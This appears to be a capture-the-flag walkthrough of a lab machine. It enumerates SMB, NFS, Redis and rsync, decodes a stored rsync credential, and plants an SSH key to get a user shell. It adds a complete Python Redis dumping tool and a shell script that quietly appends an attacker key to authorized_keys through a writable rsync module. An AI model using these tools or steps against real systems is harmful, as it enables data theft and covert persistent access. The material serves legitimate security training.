
This box exposes several services worth digging into. We will go through each of them and see how to enumerate and exploit them.

Server Message Block (SMB)

Listing shares available to an anonymous (guest) session

❯ smbmap -H 10.10.60.45
[+] Guest session       IP: 10.10.60.45:445 Name: 10.10.60.45                                       
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    print$                                              NO ACCESS   Printer Drivers
    shares                                              READ ONLY   VulnNet Business Shares
    IPC$                                                NO ACCESS   IPC Service (vulnnet-internal server (Samba, Ubuntu))

Anonymous Access

Connect to the “shares” share with a null (no-password) session using the following command; -N suppresses the password prompt.

smbclient //$target/shares -N

smb: \> ls  
.  
..  
temp  
data  
smb: \>

Network File System (NFS)

Listing exports

Use showmount -e to list the directories the NFS server exports and which clients are allowed to mount them. An export list of * means any host can mount it.

❯ sudo showmount -e $target  
[sudo] password for sak:  
Export list for 10.10.10.1:  
/opt/conf *

Mounting

Create a temporary directory and mount the export by running the following commands as root or as a user with sudo privileges. Files in the mounted tree keep their server-side UID/GID, so check which of them your local user can actually read, and remember that the export may squash root (root_squash) before relying on it for writes.

mkdir /tmp/mount1
sudo mount -t nfs 10.10.0.10:/opt/conf /tmp/mount1
cd /tmp/mount1
ls

Redis

Redis is an in-memory key-value store. When it listens on the network with no password, or a weak one, its whole dataset can be read with redis-cli. Passing the password with -a leaves it in your shell history and in the process list (hence the warning below); redis-cli also reads it from the REDISCLI_AUTH environment variable, which avoids that.

❯ redis-cli -h $target -p 6379 -a [password]  
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.  
10.10.96.14:6379>

To list all the keys in Redis we can run KEYS *. Note that KEYS walks the entire keyspace and blocks the server while doing so; on a large production instance use SCAN instead.

10.10.96.14:6379> KEYS *
1) "int"
2) "internal flag"
3) "authlist"
4) "tmp"
5) "marketlist"
10.10.96.14:6379>

The flag is stored under the key "internal flag". It is a plain string, so GET returns it:

GET "internal flag"

Auth Key

To find the type of a key in Redis we run TYPE <key>:

10.10.60.45:6379> type authlist
list

authlist is a list-type key, so we read its value with LRANGE. Keep in mind that LRANGE indices are zero-based: lrange authlist 1 100 skips element 0, and lrange authlist 0 -1 returns the whole list whatever its length. On this box the command below is enough:

10.10.60.45:6379> lrange authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4**************************"
.
.
.

Decoding this base64 message gives the rsync credentials: the visible prefix decodes to "Authorization for rsync://rsync-connect@127.", which yields the username rsync-connect; the masked remainder holds the password.
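The KEYS/GET and TYPE/LRANGE steps above are done by hand. The following added example (my code, not part of the original writeup) does the same job in one pass: a minimal Redis client on the raw RESP protocol, standard library only, that enumerates the keyspace with SCAN instead of the blocking KEYS *, reads each key with the command its TYPE requires (GET, LRANGE 0 -1, SMEMBERS, ZRANGE, HGETALL), and tries to base64-decode every string value the way the authlist entry was decoded. Host, port and password are assumptions taken from the command line; the script name redis_dump.py is also an assumption.

```python
# Added example, not code from the original writeup. Stdlib only.
# Host, port and password are assumptions taken from the command line.
import base64
import socket
import sys
from typing import Any, Iterator, Optional, Tuple


class Incomplete(Exception): pass      # buffer lacks one whole RESP reply
class RedisError(Exception): pass      # server sent an error line (NOAUTH, ...)


def encode_command(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def parse_reply(buf: bytes, pos: int = 0) -> Tuple[Any, int]:
    """Parse one RESP2 reply at buf[pos]; return (value, offset after it)."""
    end = buf.find(b"\r\n", pos)
    if pos >= len(buf) or end < 0:
        raise Incomplete
    kind, line, nxt = buf[pos:pos + 1], buf[pos + 1:end], end + 2
    if kind == b"+":                       # simple string: +OK, +list
        return line.decode(), nxt
    if kind == b"-":                       # error line
        raise RedisError(line.decode())
    if kind == b":":                       # integer
        return int(line), nxt
    if kind == b"$":                       # bulk string, $-1 is nil
        n = int(line)
        if n < 0:
            return None, nxt
        if len(buf) < nxt + n + 2:
            raise Incomplete
        return buf[nxt:nxt + n].decode("utf-8", "replace"), nxt + n + 2
    if kind == b"*":                       # array, *-1 is nil
        n = int(line)
        if n < 0:
            return None, nxt
        items = []
        for _ in range(n):
            item, nxt = parse_reply(buf, nxt)
            items.append(item)
        return items, nxt
    raise ValueError("unknown RESP type byte %r" % kind)


def read_command(key: str, ktype: str) -> Optional[Tuple[str, ...]]:
    """Command that dumps a key of the given TYPE (None for unhandled types)."""
    return {
        "string": ("GET", key),
        "list": ("LRANGE", key, "0", "-1"),   # indices are 0-based, -1 = last
        "set": ("SMEMBERS", key),
        "zset": ("ZRANGE", key, "0", "-1", "WITHSCORES"),
        "hash": ("HGETALL", key),
    }.get(ktype)


def maybe_b64(value: str) -> Optional[str]:
    """Decode value as base64 if it is valid and yields printable text, else None.
    Missing '=' padding (as in the truncated authlist entry above) is tolerated."""
    try:
        text = base64.b64decode(value + "=" * (-len(value) % 4), validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    ok = text and all(c.isprintable() or c in "\r\n\t" for c in text)
    return text if ok else None


class RedisClient:
    def __init__(self, host: str, port: int = 6379, password: Optional[str] = None):
        self.sock = socket.create_connection((host, port), timeout=10)
        self.buf = b""
        if password:
            self.call("AUTH", password)

    def call(self, *args: str) -> Any:
        """Send one command and return its parsed reply."""
        self.sock.sendall(encode_command(*args))
        while True:
            try:
                value, used = parse_reply(self.buf)
            except Incomplete:
                chunk = self.sock.recv(65536)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk
                continue
            self.buf = self.buf[used:]
            return value

    def scan_keys(self, match: str = "*") -> Iterator[str]:
        """Walk the keyspace with SCAN; unlike KEYS this never blocks the server."""
        cursor = "0"
        while True:
            cursor, keys = self.call("SCAN", cursor, "MATCH", match, "COUNT", "200")
            yield from keys
            if cursor == "0":
                return

    def dump(self) -> dict:
        """Map every key to (type, value), reading each with the right command."""
        out = {}
        for key in self.scan_keys():
            ktype = self.call("TYPE", key)
            cmd = read_command(key, ktype)
            out[key] = (ktype, self.call(*cmd) if cmd else None)
        return out


if __name__ == "__main__":   # usage: redis_dump.py HOST [PASSWORD]
    client = RedisClient(sys.argv[1], password=sys.argv[2] if len(sys.argv) > 2 else None)
    for key, (ktype, value) in client.dump().items():
        print(f"{key!r} ({ktype}): {value!r}")
        for item in (value if isinstance(value, list) else [value]):
            decoded = maybe_b64(item) if isinstance(item, str) else None
            if decoded:
                print(f"    base64 -> {decoded!r}")
```

Run it as python3 redis_dump.py 10.10.96.14 '<password>'; the password is sent with AUTH over the socket rather than on a command line that other users can read. Stream keys and anything else TYPE reports that the table does not know are listed with a None value rather than guessed at.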

rsync

rsync is typically used for synchronizing files and directories between two systems. When the rsync daemon (port 873) is exposed, it serves named modules, each of which may be anonymous or password-protected and read-only or writable.

Enumeration

To list the modules the daemon exposes, give the host with an empty module name:

❯ rsync 10.10.60.45::
files           Necessary home interaction

Connecting with rsync 10.10.60.45::files fails with "auth failed" even when the correct password is typed, because no username is given: rsync then sends your local login name rather than rsync-connect. Supplying the username in the URL form, we can copy everything the module exposes:

rsync -av rsync://rsync-connect@10.10.60.45/files user_files
Password: 
receiving incremental file list
created directory user_files

Once the transfer finishes, everything the module exposes is under the user_files directory on our machine (-a keeps the original permissions and timestamps), and that is where we found the user flag.

User Shell via SSH Key Manipulation

While going through the copied sys-internal home directory we found a .ssh directory, and the files module turns out to be writable as well, so rsync can upload into it. We push our public key as the authorized_keys file of sys-internal with the command shown below. Note that this overwrites any authorized_keys already there; on a real engagement pull the existing file first and append to it.

❯ rsync -av /home/goliboi/.ssh/id_rsa.pub rsync://rsync-connect@10.10.60.45/files/sys-internal/.ssh/authorized_keys
Password:
.
.
.
sent 661 bytes  received 144 bytes  84.74 bytes/sec
total size is 565  speedup is 0.70
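The upload above replaces the target's authorized_keys outright, which locks out any key the owner already uses and is easy to notice. The following added example (my script, not part of the original writeup) pulls the current file through the same writable module, appends our key only if it is not already present, and pushes the merged file back with mode 600, since sshd with StrictModes refuses an authorized_keys that is group- or world-writable. The module name files, the username rsync-connect and the path sys-internal/.ssh are taken from the writeup; the local key path and the script name are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup. Assumes the writable rsync
# module "files", daemon user "rsync-connect" and target directory
# sys-internal/.ssh shown above; the local public key path is an assumption.
set -e

# merge_keys EXISTING NEW OUT: write EXISTING (if it exists) plus every line
# of NEW that is not already present, then make OUT mode 600. Exact-line
# matching keeps the operation idempotent and never drops an existing key.
merge_keys() {
    existing=$1; new=$2; out=$3
    : > "$out"
    [ -f "$existing" ] && cat "$existing" >> "$out"
    # "|| [ -n "$line" ]" also handles a key file without a trailing newline
    while IFS= read -r line || [ -n "$line" ]; do
        [ -z "$line" ] && continue
        grep -qxF -- "$line" "$out" || printf '%s\n' "$line" >> "$out"
    done < "$new"
    chmod 600 "$out"
}

# push_key TARGET MODULE REMOTE_DIR PUBKEY: pull, merge, push back.
push_key() {
    target=$1; module=$2; remote_dir=$3; pubkey=$4
    url="rsync://rsync-connect@$target/$module/$remote_dir/authorized_keys"
    work=$(mktemp -d)
    # A missing remote authorized_keys is not an error: start from empty.
    rsync -a "$url" "$work/current" 2>/dev/null || true
    merge_keys "$work/current" "$pubkey" "$work/authorized_keys"
    # -a carries the 600 mode over; --chmod enforces it even if the local
    # umask or a pre-existing remote file would have loosened it.
    rsync -a --chmod=Fu=rw,Fgo-rwx "$work/authorized_keys" "$url"
    rm -rf "$work"
}

# Usage: sh push_key.sh 10.10.60.45 files sys-internal/.ssh ~/.ssh/id_rsa.pub
if [ "$#" -eq 4 ]; then
    push_key "$@"
fi
```

The daemon prompts for the rsync-connect password twice (once per transfer); after the push, ssh -i ~/.ssh/id_rsa -o IdentitiesOnly=yes sys-internal@10.10.60.45 should log in without touching any other key in the file.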

With the matching private key we can now log in as sys-internal. sudo is not needed for this step; ssh only requires that the key file is owned by the local user and not readable by others (mode 600).

❯ sudo ssh sys-internal@10.10.60.45 -i /home/goliboi/.ssh/id_rsa
[sudo] password for goliboi: .
.
.
.
sys-internal@vulnnet-internal:~$ id
uid=1000(sys-internal) gid=1000(sys-internal) groups=1000(sys-internal),24(cdrom)